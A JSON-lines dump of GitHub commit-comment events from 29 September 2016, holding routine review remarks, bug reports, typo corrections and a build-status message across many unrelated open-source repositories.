{"id":"4640418974","type":"CommitCommentEvent","actor":{"login":"gwwar"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19233142,"position":26,"line":26,"path":"client/state/states-list/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-29T22:41:08Z","updated_at":"2016-09-29T22:41:08Z","body":"I don't have any strong feelings either. We should be consistent though with upper or lower case"}},"created_at":"2016-09-29T22:41:08Z"}
{"id":"4640438925","type":"CommitCommentEvent","actor":{"login":"chauduong"},"repo":{"name":"modelergy/gitbucket"},"payload":{"comment":{"id":19233194,"position":null,"line":null,"path":null,"commit_id":"2381d7e9076fcbb6e18b536d44db0ff16e339671","created_at":"2016-09-29T22:46:12Z","updated_at":"2016-09-29T22:46:12Z","body":"when uploading a .docx file by drag/drop, I'm getting the following code.\r\n\"Uploading your files...\r\nServer responded with 0 code.\""}},"created_at":"2016-09-29T22:46:12Z"}
{"id":"4640439175","type":"CommitCommentEvent","actor":{"login":"obenland"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19233195,"position":26,"line":26,"path":"client/state/states-list/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-29T22:46:15Z","updated_at":"2016-09-29T22:46:15Z","body":"I went with lowercase"}},"created_at":"2016-09-29T22:46:15Z"}
{"id":"4640442002","type":"CommitCommentEvent","actor":{"login":"dhirajsb"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19233200,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-29T22:46:55Z","updated_at":"2016-09-29T22:46:55Z","body":"@sirlatrom did you get a chance to test this and see if there are still any holes in the reconnect logic? "}},"created_at":"2016-09-29T22:46:55Z"}
{"id":"4640459317","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"UkCvs/commando"},"payload":{"comment":{"id":19233261,"position":null,"line":null,"path":null,"commit_id":"9c5a42aa08d5e9c6fc29209ddd90046c77e1f28e","created_at":"2016-09-29T22:51:25Z","updated_at":"2016-09-29T22:51:25Z","body":"Many thanks"}},"created_at":"2016-09-29T22:51:25Z"}
{"id":"4640459444","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"future-architect/vuls"},"payload":{"comment":{"id":19233262,"position":10,"line":449,"path":"scan/serverapi.go","commit_id":"11b010b2815636e500bac8f8791978e21c2d7765","created_at":"2016-09-29T22:51:27Z","updated_at":"2016-09-29T22:51:27Z","body":"Why does this `defer` again?"}},"created_at":"2016-09-29T22:51:27Z"}
{"id":"4640467607","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":19233297,"position":null,"line":null,"path":null,"commit_id":"51f46e430b39fe9a0cc0817918e2cb3b5e72b8d7","created_at":"2016-09-29T22:53:35Z","updated_at":"2016-09-29T22:53:35Z","body":"Feedback incorporated in a new branch.\r\n\r\n* Doesn't break existing tests\r\n* Squashed into fewer commits\r\n* Added a skeleton kvstore builder\r\n\r\nhttps://github.com/adsharma/flatbuffers/commits/byteorder2"}},"created_at":"2016-09-29T22:53:35Z"}
{"id":"4640477352","type":"CommitCommentEvent","actor":{"login":"evieira55"},"repo":{"name":"almindor/etherwall"},"payload":{"comment":{"id":19233336,"position":null,"line":null,"path":null,"commit_id":"7ca9c856a98e5558cc4deb536cae8c23cb091031","created_at":"2016-09-29T22:56:08Z","updated_at":"2016-09-29T22:56:08Z","body":"staying updated"}},"created_at":"2016-09-29T22:56:08Z"}
{"id":"4640480317","type":"CommitCommentEvent","actor":{"login":"ploth"},"repo":{"name":"nagua/harbour-taskwarrior-GUI"},"payload":{"comment":{"id":19233356,"position":null,"line":null,"path":null,"commit_id":"827839fa84f445b25b2d4fef1c44af3a583eaefc","created_at":"2016-09-29T22:56:54Z","updated_at":"2016-09-29T22:56:54Z","body":"whoops, missed it"}},"created_at":"2016-09-29T22:56:54Z"}
{"id":"4640484059","type":"CommitCommentEvent","actor":{"login":"ploth"},"repo":{"name":"nagua/harbour-taskwarrior-GUI"},"payload":{"comment":{"id":19233369,"position":4,"line":30,"path":"qml/pages/DetailTask.qml","commit_id":"3f9317a3fed653cbfdac6b002fe4682ec18e19ee","created_at":"2016-09-29T22:57:52Z","updated_at":"2016-09-29T22:57:52Z","body":"Oh that is quite handy."}},"created_at":"2016-09-29T22:57:52Z"}
{"id":"4640484848","type":"CommitCommentEvent","actor":{"login":"treyzania"},"repo":{"name":"TheFriendlyDevs/BukkitUtils"},"payload":{"comment":{"id":19233378,"position":52,"line":33,"path":"src/com/thefriendlydevs/bukkitutils/circleequations/Circles.java","commit_id":"208c14abb067bdbe854c2cc5a4e1d439447e3a25","created_at":"2016-09-29T22:58:03Z","updated_at":"2016-09-29T22:58:03Z","body":"Limiting this to 100 means that if the circle is over radius ~16 then hole will start to appear.  I suggest making that number something like `(int) Math.floor(2 * Math.PI * radius * 1.1F)`, and then changing the logic for the `increment` parameter a bit."}},"created_at":"2016-09-29T22:58:03Z"}
{"id":"4640487773","type":"CommitCommentEvent","actor":{"login":"HackerDemoniced"},"repo":{"name":"HackerDemoniced/CashForwarder"},"payload":{"comment":{"id":19233387,"position":null,"line":null,"path":null,"commit_id":"05e78ca261fae95c01edc0496d6fc41e8c50eeba","created_at":"2016-09-29T22:58:44Z","updated_at":"2016-09-29T22:58:44Z","body":"ATMip"}},"created_at":"2016-09-29T22:58:44Z"}
{"id":"4640492184","type":"CommitCommentEvent","actor":{"login":"ilevkivskyi"},"repo":{"name":"python/typing"},"payload":{"comment":{"id":19233398,"position":6,"line":611,"path":"python2/typing.py","commit_id":"c5b66dea9ca1ac98f5d7b73c7230252f7cc5d354","created_at":"2016-09-29T22:59:51Z","updated_at":"2016-09-29T22:59:51Z","body":"I am sorry, but I don't completely understand what do you mean here. I just tried this in both Python 2 and 3 and ``Union[int, object]`` returns ``object`` at runtime (also this case remains in tests). As well I do not see why this should be different from the example above\r\n```\r\nUnion[Employee, Manager] == Employee\r\n```\r\nOr you suggest that it is also wrong? If yes, could you provide an example where a union of a class and its subclass should be treated differently than simply that class?"}},"created_at":"2016-09-29T22:59:51Z"}
{"id":"4640496465","type":"CommitCommentEvent","actor":{"login":"rafaelrend"},"repo":{"name":"rafaelrend/WPF-FTP-WinPhone"},"payload":{"comment":{"id":19233419,"position":null,"line":null,"path":null,"commit_id":"16b1c0fae1b227b90323fc90af11b39a998235a7","created_at":"2016-09-29T23:00:54Z","updated_at":"2016-09-29T23:00:54Z","body":"ok"}},"created_at":"2016-09-29T23:00:54Z"}
{"id":"4640497830","type":"CommitCommentEvent","actor":{"login":"sombree"},"repo":{"name":"zwliew/android_device_samsung_jf-common"},"payload":{"comment":{"id":19233424,"position":null,"line":null,"path":null,"commit_id":"7c77427c33c50ac827242e0fe0c52b5509d45649","created_at":"2016-09-29T23:01:13Z","updated_at":"2016-09-29T23:01:13Z","body":"what exactly isn't working on the kernel-side? i've been poking around compress offload but for no apparent reason system was switching back to deep-buffer-playback. i can grab some logs if you want. \r\nand yeah, i've applied related commits from codeaurora."}},"created_at":"2016-09-29T23:01:13Z"}
{"id":"4640502132","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19233434,"position":null,"line":null,"path":null,"commit_id":"62b166ebb79426ba5cbf2778875b1c286afdddc3","created_at":"2016-09-29T23:02:16Z","updated_at":"2016-09-29T23:02:16Z","body":"Added in patch 3.1.2. [Source](http://www.wowhead.com/item=45902/phantom-ghostfish#comments:id=676626:reply=97542)."}},"created_at":"2016-09-29T23:02:16Z"}
{"id":"4640503713","type":"CommitCommentEvent","actor":{"login":"lucasart"},"repo":{"name":"lucasart/Demolito"},"payload":{"comment":{"id":19233438,"position":null,"line":null,"path":null,"commit_id":"fcad29200a5e061f6037c770be2b610db047698c","created_at":"2016-09-29T23:02:44Z","updated_at":"2016-09-29T23:02:44Z","body":"try google"}},"created_at":"2016-09-29T23:02:44Z"}
{"id":"4640503727","type":"CommitCommentEvent","actor":{"login":"LraiZer"},"repo":{"name":"UkCvs/commando"},"payload":{"comment":{"id":19233437,"position":null,"line":null,"path":null,"commit_id":"9c5a42aa08d5e9c6fc29209ddd90046c77e1f28e","created_at":"2016-09-29T23:02:44Z","updated_at":"2016-09-29T23:02:44Z","body":"Your welcome"}},"created_at":"2016-09-29T23:02:44Z"}
{"id":"4640509061","type":"CommitCommentEvent","actor":{"login":"chauduong"},"repo":{"name":"modelergy/gitbucket"},"payload":{"comment":{"id":19233465,"position":null,"line":null,"path":null,"commit_id":"2381d7e9076fcbb6e18b536d44db0ff16e339671","created_at":"2016-09-29T23:04:05Z","updated_at":"2016-09-29T23:04:05Z","body":"When trying to upload an unsupported type, it says these types \"PNG, GIF, JPG, DOCX, PPTX, XLSX, TXT, or PDF\" are supported, but I think it supports a different set"}},"created_at":"2016-09-29T23:04:05Z"}
{"id":"4640510229","type":"CommitCommentEvent","actor":{"login":"FoxIshDaBest"},"repo":{"name":"MCPluginDev/License"},"payload":{"comment":{"id":19233472,"position":null,"line":null,"path":null,"commit_id":"e774eedf4f9f3199de52d52bca94214515693a67","created_at":"2016-09-29T23:04:23Z","updated_at":"2016-09-29T23:04:23Z","body":"you can't do that"}},"created_at":"2016-09-29T23:04:23Z"}
{"id":"4640511455","type":"CommitCommentEvent","actor":{"login":"harawata"},"repo":{"name":"mybatis/mybatis-3"},"payload":{"comment":{"id":19233478,"position":null,"line":null,"path":null,"commit_id":"e37d9fb49a3dcb7fa58acd6fc42c71e4d749ebe4","created_at":"2016-09-29T23:04:40Z","updated_at":"2016-09-29T23:04:40Z","body":"@nandctl \r\n`selectByExample` method only has two parameters ('tableName' and 'example') and the error says that 'distinct' is not found, so it seems like a legitimate error.\r\nIf you believe it is a bug, please create a new issue with an executable test case like this PR or a demo project using [this template](https://github.com/harawata/mybatis-issues).\r\n\r\nThank you!\r\nIwao\r\n"}},"created_at":"2016-09-29T23:04:40Z"}
{"id":"4640514539","type":"CommitCommentEvent","actor":{"login":"perdjurner"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19233491,"position":null,"line":null,"path":null,"commit_id":"9e7bcfab33b1e85c4a7f50f02d98c41bd3bb9618","created_at":"2016-09-29T23:05:27Z","updated_at":"2016-09-29T23:05:27Z","body":"That info was incorrect (my bad). You still need to import your providers, just not your pipes and custom components."}},"created_at":"2016-09-29T23:05:27Z"}
{"id":"4640519130","type":"CommitCommentEvent","actor":{"login":"greenlantern9"},"repo":{"name":"hartiganbg/TicTacToe"},"payload":{"comment":{"id":19233515,"position":10,"line":10,"path":"README.md","commit_id":"d1567510e403270002a3eca268618b3212b9918b","created_at":"2016-09-29T23:06:34Z","updated_at":"2016-09-29T23:06:34Z","body":"\"Tic-tac-toe, also called noughts and crosses (in the British Commonwealth countries), X's and O's (in Ireland) and X and 0 (in India) is a pencil-and-paper game for two players, X and O, who take turns marking the spaces in a 3×3 grid. The X player usually goes first. The player who succeeds in placing three respective marks in a horizontal, vertical, or diagonal row wins the game.\" (Wikipedia)\r\n \r\nCreate an advanced, flexible tic-tac-toe game for the console. The game should work as follows:\r\n \r\n1. Ask if the player would like to resume a saved game. If yes, load game state from a text or binary file (your choice of file format).\r\nFor a new game, ask how many players are playing as a prompt on its own line. The maximum number of players is 26.\r\nFor a new game, ask how large the board should be as a prompt on its own line. The maximum number is 999.\r\nFor a new game, ask what the win sequence count should be (i.e. 3 would be normal standard tic-tac-toe) as a prompt on its own line.\r\nFor a new game, check to ensure that winning is possible given the criteria specified, and display an error and quit if not.\r\n2. Output a board in the following general format:\r\n \r\n    1   2   3\r\n1     |   |\r\n   ---+---+---\r\n2     |   |\r\n   ---+---+---\r\n3     |   |\r\nNo other board format will be accepted. You must number the rows and columns, not each box. You can treat the screen as infinitely large, so if you run out of screen space, do not worry about it wrapping or having scroll bars appear. The maximum number of rows/columns will be 999, so three spaces is enough.\r\n \r\n2. Repeat the following process over and over again until the user saves and quits, the game is won, or a tie occurs:\r\nAsk the user for a row and column number separated by spaces, or Q to quit. Put the appropriate symbol for that player in the specified spot. Players should be given the following symbols, in order: XOABCDEFGHIJKLMNPQRSTUVWYZ\r\nIf the user chooses instead to save and quit, ask them for a filename in a prompt on its own line. Then, save to that file and quit.\r\n \r\nIf you are confused about the rules of Tic-Tac-Toe, please consult the Wikipedia page"}},"created_at":"2016-09-29T23:06:34Z"}
{"id":"4640522218","type":"CommitCommentEvent","actor":{"login":"AvisekNaug"},"repo":{"name":"AvisekNaug/Practice"},"payload":{"comment":{"id":19233534,"position":null,"line":null,"path":null,"commit_id":"8cd8c409d531a39eb188c0e13f7be41ac8ea1b1e","created_at":"2016-09-29T23:07:24Z","updated_at":"2016-09-29T23:07:24Z","body":"New file added for the first time"}},"created_at":"2016-09-29T23:07:24Z"}
{"id":"4640525710","type":"CommitCommentEvent","actor":{"login":"gvanrossum"},"repo":{"name":"python/typing"},"payload":{"comment":{"id":19233555,"position":6,"line":611,"path":"python2/typing.py","commit_id":"c5b66dea9ca1ac98f5d7b73c7230252f7cc5d354","created_at":"2016-09-29T23:08:15Z","updated_at":"2016-09-29T23:08:15Z","body":"So sorry! I misread this as Union[Any, object]. Will merge now."}},"created_at":"2016-09-29T23:08:15Z"}
{"id":"4640527894","type":"CommitCommentEvent","actor":{"login":"MatthewWEdwards"},"repo":{"name":"MatthewWEdwards/EE442C_Project3"},"payload":{"comment":{"id":19233563,"position":null,"line":null,"path":null,"commit_id":"57aa03f62200ca5cf14197c214d81596b21eb617","created_at":"2016-09-29T23:08:49Z","updated_at":"2016-09-29T23:08:49Z","body":"Also added additional checks for overflows in the DFS"}},"created_at":"2016-09-29T23:08:49Z"}
{"id":"4640527905","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"CircleBoy/CircleBoy.github.io"},"payload":{"comment":{"id":19233564,"position":8,"line":8,"path":"_posts/2016-06-29-bloc-so-far.md","commit_id":"e238f08177dac609538591de1e9dcf0d5774f223","created_at":"2016-09-29T23:08:49Z","updated_at":"2016-09-29T23:08:49Z","body":"- [ ] You have two spaces in between 'other' and 'online'."}},"created_at":"2016-09-29T23:08:49Z"}
{"id":"4640530446","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"CircleBoy/CircleBoy.github.io"},"payload":{"comment":{"id":19233582,"position":8,"line":8,"path":"_posts/2016-06-29-bloc-so-far.md","commit_id":"e238f08177dac609538591de1e9dcf0d5774f223","created_at":"2016-09-29T23:09:29Z","updated_at":"2016-09-29T23:09:29Z","body":"- [ ] \"theres\" in \"theres the interface\" should have an apostrophe."}},"created_at":"2016-09-29T23:09:29Z"}
{"id":"4640532231","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"CircleBoy/CircleBoy.github.io"},"payload":{"comment":{"id":19233591,"position":8,"line":8,"path":"_posts/2016-06-29-bloc-so-far.md","commit_id":"e238f08177dac609538591de1e9dcf0d5774f223","created_at":"2016-09-29T23:10:00Z","updated_at":"2016-09-29T23:10:00Z","body":"- [ ] Google is a proper noun and should be capitalized."}},"created_at":"2016-09-29T23:10:00Z"}
{"id":"4640532732","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"CircleBoy/CircleBoy.github.io"},"payload":{"comment":{"id":19233593,"position":8,"line":8,"path":"_posts/2016-06-29-bloc-so-far.md","commit_id":"e238f08177dac609538591de1e9dcf0d5774f223","created_at":"2016-09-29T23:10:08Z","updated_at":"2016-09-29T23:10:08Z","body":"Do you want me to keep adding suggestions? Let me know."}},"created_at":"2016-09-29T23:10:08Z"}
{"id":"4640536972","type":"CommitCommentEvent","actor":{"login":"hcook"},"repo":{"name":"ucb-bar/riscv-torture"},"payload":{"comment":{"id":19233617,"position":null,"line":null,"path":null,"commit_id":"9b161a1641da57d437cadc4efd3edf0f5bb4a4fb","created_at":"2016-09-29T23:11:15Z","updated_at":"2016-09-29T23:11:15Z","body":"Does this work for you with spike? I'm getting infinite\r\n`\r\ncore   0: exception trap_illegal_instruction, epc 0x0000000000001010\r\ncore   0: 0x0000000000001010 (0x00000000) addi    s0, sp, 0\r\n`\r\nMight be my bad\r\n"}},"created_at":"2016-09-29T23:11:15Z"}
{"id":"4640541388","type":"CommitCommentEvent","actor":{"login":"fatcerberus"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":19233643,"position":129,"line":129,"path":"doc/symbols.rst","commit_id":"8d3fb8b3aee04872a6f8000fa9ea8632e0793af4","created_at":"2016-09-29T23:12:24Z","updated_at":"2016-09-29T23:12:24Z","body":"V8 has this to say:\r\n```\r\n> var sym1 = Symbol(), sym2 = Symbol(\"\"), sym3 = Symbol(\"pig\");\r\nundefined\r\n> [ sym1, sym2, sym3 ]\r\n[ Symbol(), Symbol(), Symbol(pig) ]\r\n>\r\n```\r\n\r\nOf course this is no guarantee of semantic equivalence, but they coerce the same, at least."}},"created_at":"2016-09-29T23:12:24Z"}
{"id":"4640542139","type":"CommitCommentEvent","actor":{"login":"fbbdev"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19233648,"position":12,"line":17,"path":"index.js","commit_id":"cbccaf2ac55fa172c59891a9648dd45ab1ec1ded","created_at":"2016-09-29T23:12:37Z","updated_at":"2016-09-29T23:12:37Z","body":"Touché! :D I thought it would be fine here because it's not out of scope for this module and people can expect it, while they do not expect node-fastcgi - which is a lower-level library - to do that.\r\nHowever, when I avoided suggesting you to set the `baseUrl` property, it was on purpose. Like you said, express does not like that and I bet other frameworks would be confused too. This is why I suggested you just expose the `getBaseUrl` function, bound to the platform object."}},"created_at":"2016-09-29T23:12:37Z"}
{"id":"4640548448","type":"CommitCommentEvent","actor":{"login":"qureshlatif"},"repo":{"name":"qureshlatif/Julia-Kelly-Ch4"},"payload":{"comment":{"id":19233682,"position":null,"line":null,"path":null,"commit_id":"3681feb8b249c157cb5a0f893e2618f1801cc7cf","created_at":"2016-09-29T23:14:20Z","updated_at":"2016-09-29T23:14:20Z","body":"Oops, there were actually no major changes with this commit other than minor changes to comments. I had already fixed the error that I thought I was fixing with this commit."}},"created_at":"2016-09-29T23:14:20Z"}
{"id":"4640551169","type":"CommitCommentEvent","actor":{"login":"uzi"},"repo":{"name":"schwers/reddit-mobile"},"payload":{"comment":{"id":19233692,"position":null,"line":null,"path":null,"commit_id":"8c22b16f066f9bbb29b3b4a9db99ce2d76c69294","created_at":"2016-09-29T23:15:10Z","updated_at":"2016-09-29T23:15:10Z","body":":fish:"}},"created_at":"2016-09-29T23:15:10Z"}
{"id":"4640557578","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine-core"},"payload":{"comment":{"id":19233725,"position":null,"line":null,"path":null,"commit_id":"e10017ed570e651a681c3d3675880ea7e09c64a1","created_at":"2016-09-29T23:16:57Z","updated_at":"2016-09-29T23:16:57Z","body":"@farskipper would you be so kind as to review and assure me that I am on the right track?\r\n\r\ncurrent KRE meta module described here: https://picolabs.atlassian.net/wiki/display/docs/meta"}},"created_at":"2016-09-29T23:16:57Z"}
{"id":"4640557636","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"asmecher/ojs"},"payload":{"comment":{"id":19233726,"position":null,"line":null,"path":null,"commit_id":"6d71e21dbd64c6d5db5cb382caa33d139b95bf3b","created_at":"2016-09-29T23:16:58Z","updated_at":"2016-09-29T23:16:58Z","body":"I would expect the metadata served not to be dependent on the user's current locale -- rather, it should always be consistent, and include alternate languages with `xml:lang` attributes. Would that suit your needs?"}},"created_at":"2016-09-29T23:16:58Z"}
{"id":"4640559954","type":"CommitCommentEvent","actor":{"login":"fbbdev"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19233742,"position":37,"line":59,"path":"index.js","commit_id":"2171973b3caa9135a3ebe3a1437919cba0d0334a","created_at":"2016-09-29T23:17:38Z","updated_at":"2016-09-29T23:17:38Z","body":"Please use `app.apply(this, arguments)` it's more fault-tolerant, future-proof, and any other hyphenated compound meaning good things. :smile:"}},"created_at":"2016-09-29T23:17:38Z"}
{"id":"4640560474","type":"CommitCommentEvent","actor":{"login":"justenwalker"},"repo":{"name":"joyent/containerpilot"},"payload":{"comment":{"id":19233745,"position":null,"line":null,"path":null,"commit_id":"9278155bfc8382dbe1202c43d92094fd098ad80c","created_at":"2016-09-29T23:17:47Z","updated_at":"2016-09-29T23:17:47Z","body":"LGTM. Nice catch BTW."}},"created_at":"2016-09-29T23:17:47Z"}
{"id":"4640562015","type":"CommitCommentEvent","actor":{"login":"sirlatrom"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19233753,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-29T23:18:11Z","updated_at":"2016-09-29T23:18:11Z","body":"I'll try and see if I can get back to you tomorrow, Friday CEST - otherwise\nI'll be going on vacation for 2 weeks, after which I'll definitely have to\nget back to this issue.\n\nOn Fri, 30 Sep 2016 at 00:47 Dhiraj Bokde <notifications@github.com> wrote:\n\n> @sirlatrom <https://github.com/sirlatrom> did you get a chance to test\n> this and see if there are still any holes in the reconnect logic?\n>\n> —\n> You are receiving this because you were mentioned.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apache/camel/commit/7d97e5b5800969b74e805e66a94a6c5323bfeafc#commitcomment-19233200>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAZ-oVAmtXeAqYJ0ZD8h_VdUpOvmpmduks5qvD_ngaJpZM4KEyvs>\n> .\n>\n"}},"created_at":"2016-09-29T23:18:11Z"}
{"id":"4640567576","type":"CommitCommentEvent","actor":{"login":"runytry1"},"repo":{"name":"runytry1/runytry"},"payload":{"comment":{"id":19233781,"position":null,"line":null,"path":null,"commit_id":"75d7a6f4516f7e55c1ed5cc7fccae39ca8c54ced","created_at":"2016-09-29T23:19:54Z","updated_at":"2016-09-29T23:19:54Z","body":" Added .gitattributes & .gitignore f…"}},"created_at":"2016-09-29T23:19:54Z"}
{"id":"4640569820","type":"CommitCommentEvent","actor":{"login":"apcraig"},"repo":{"name":"ESMCI/cime"},"payload":{"comment":{"id":19233787,"position":null,"line":null,"path":null,"commit_id":"63772d874cdfe7618a27805b82aab9bbdd6fbd00","created_at":"2016-09-29T23:20:33Z","updated_at":"2016-09-29T23:20:33Z","body":"I don't see any problems with that approach.  I assume the first if block was just to save some time."}},"created_at":"2016-09-29T23:20:33Z"}
{"id":"4640573331","type":"CommitCommentEvent","actor":{"login":"runytry1"},"repo":{"name":"runytry1/runytry"},"payload":{"comment":{"id":19233802,"position":null,"line":null,"path":null,"commit_id":"75d7a6f4516f7e55c1ed5cc7fccae39ca8c54ced","created_at":"2016-09-29T23:21:35Z","updated_at":"2016-09-29T23:21:35Z","body":"[](url)"}},"created_at":"2016-09-29T23:21:35Z"}
{"id":"4640576035","type":"CommitCommentEvent","actor":{"login":"svaarala"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":19233807,"position":129,"line":129,"path":"doc/symbols.rst","commit_id":"8d3fb8b3aee04872a6f8000fa9ea8632e0793af4","created_at":"2016-09-29T23:22:24Z","updated_at":"2016-09-29T23:22:24Z","body":"I actually checked that: ES6 says the internal [[Description]] property can be either undefined or a string (empty or otherwise). So there's an internal distinction in theory. In practice where the [[Description]] gets used, undefined description is treated like an empty string description so the difference doesn't seem to have a practical impact now."}},"created_at":"2016-09-29T23:22:24Z"}
{"id":"4640577831","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"MozVR/mozvr-site"},"payload":{"comment":{"id":19233815,"position":null,"line":null,"path":null,"commit_id":"4c6c64db9b77f41db1889d1eda720cdb079c4802","created_at":"2016-09-29T23:22:54Z","updated_at":"2016-09-29T23:22:54Z","body":"heh, thanks"}},"created_at":"2016-09-29T23:22:54Z"}
{"id":"4640578378","type":"CommitCommentEvent","actor":{"login":"lawrencelau125"},"repo":{"name":"bernerd252/secretbeer"},"payload":{"comment":{"id":19233817,"position":4,"line":87,"path":"css/app.js","commit_id":"e350edf47a8145e56a558c1590f1e61e6bc1cb67","created_at":"2016-09-29T23:23:04Z","updated_at":"2016-09-29T23:23:04Z","body":"ok to keep"}},"created_at":"2016-09-29T23:23:04Z"}
{"id":"4640582983","type":"CommitCommentEvent","actor":{"login":"lawrencelau125"},"repo":{"name":"bernerd252/secretbeer"},"payload":{"comment":{"id":19233840,"position":19,"line":124,"path":"css/app.js","commit_id":"e350edf47a8145e56a558c1590f1e61e6bc1cb67","created_at":"2016-09-29T23:24:23Z","updated_at":"2016-09-29T23:24:23Z","body":"good"}},"created_at":"2016-09-29T23:24:23Z"}
{"id":"4640595251","type":"CommitCommentEvent","actor":{"login":"colinschmidt"},"repo":{"name":"ucb-bar/riscv-torture"},"payload":{"comment":{"id":19233877,"position":null,"line":null,"path":null,"commit_id":"9b161a1641da57d437cadc4efd3edf0f5bb4a4fb","created_at":"2016-09-29T23:27:56Z","updated_at":"2016-09-29T23:27:56Z","body":"Did you submodule update? I was able to run an \"rgentest\" on DefaultConfig which runs the program through spike and simv and it said the signatures matched.\r\nThe env pointer needed to be bumped in here and it should match the tools submoduled in rocket-chip (not the head of priv-1.9)."}},"created_at":"2016-09-29T23:27:56Z"}
{"id":"4640600569","type":"CommitCommentEvent","actor":{"login":"hhostermann"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19233894,"position":null,"line":null,"path":null,"commit_id":"4a5c6cbb0a00518c44d792437593df65b6f4bd2b","created_at":"2016-09-29T23:29:30Z","updated_at":"2016-09-29T23:29:30Z","body":"corrigido"}},"created_at":"2016-09-29T23:29:30Z"}
{"id":"4640604428","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19233905,"position":null,"line":null,"path":null,"commit_id":"288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2","created_at":"2016-09-29T23:30:35Z","updated_at":"2016-09-29T23:30:35Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2288 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.63%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T23:30:35Z"}
{"id":"4640607802","type":"CommitCommentEvent","actor":{"login":"jamesboswell"},"repo":{"name":"chaeplin/thold-slack"},"payload":{"comment":{"id":19233930,"position":null,"line":null,"path":null,"commit_id":"adf705fd08459d45b331a6f6fde285906a086650","created_at":"2016-09-29T23:31:32Z","updated_at":"2016-09-29T23:31:32Z","body":"Twitter output,  **nice!**"}},"created_at":"2016-09-29T23:31:32Z"}
{"id":"4640611436","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eef2118/relaxr-landing-page"},"payload":{"comment":{"id":19233951,"position":50,"line":50,"path":"css/style.css","commit_id":"3ec36fab0cfac01c2493127c69e117a1c7663f1c","created_at":"2016-09-29T23:32:37Z","updated_at":"2016-09-29T23:32:37Z","body":"Watch out for where your opening curly braces are, it should come right after the selection name so `.company-yellow { `."}},"created_at":"2016-09-29T23:32:37Z"}
{"id":"4640614630","type":"CommitCommentEvent","actor":{"login":"Beesyaar"},"repo":{"name":"Beesyaar/imad-2016-app"},"payload":{"comment":{"id":19233957,"position":null,"line":null,"path":null,"commit_id":"62c3c96a64e7fc6d0fa38c3a13660be0f8e3b05a","created_at":"2016-09-29T23:33:35Z","updated_at":"2016-09-29T23:33:35Z","body":"![tux ninja](https://cloud.githubusercontent.com/assets/22291332/18975887/2f6acade-86cb-11e6-98b7-777e46c9d2de.png)\r\n"}},"created_at":"2016-09-29T23:33:35Z"}
{"id":"4640615026","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eef2118/relaxr-landing-page"},"payload":{"comment":{"id":19233958,"position":60,"line":60,"path":"css/style.css","commit_id":"3ec36fab0cfac01c2493127c69e117a1c7663f1c","created_at":"2016-09-29T23:33:43Z","updated_at":"2016-09-29T23:33:43Z","body":"Instead of the large right and left padding, you should be able to do `margin: 75px auto;` to center the button."}},"created_at":"2016-09-29T23:33:43Z"}
{"id":"4640617847","type":"CommitCommentEvent","actor":{"login":"Beesyaar"},"repo":{"name":"Beesyaar/imad-2016-app"},"payload":{"comment":{"id":19233962,"position":null,"line":null,"path":null,"commit_id":"62c3c96a64e7fc6d0fa38c3a13660be0f8e3b05a","created_at":"2016-09-29T23:34:35Z","updated_at":"2016-09-29T23:34:35Z","body":"I need to replace the homepage madi.png with tux ninja.png."}},"created_at":"2016-09-29T23:34:35Z"}
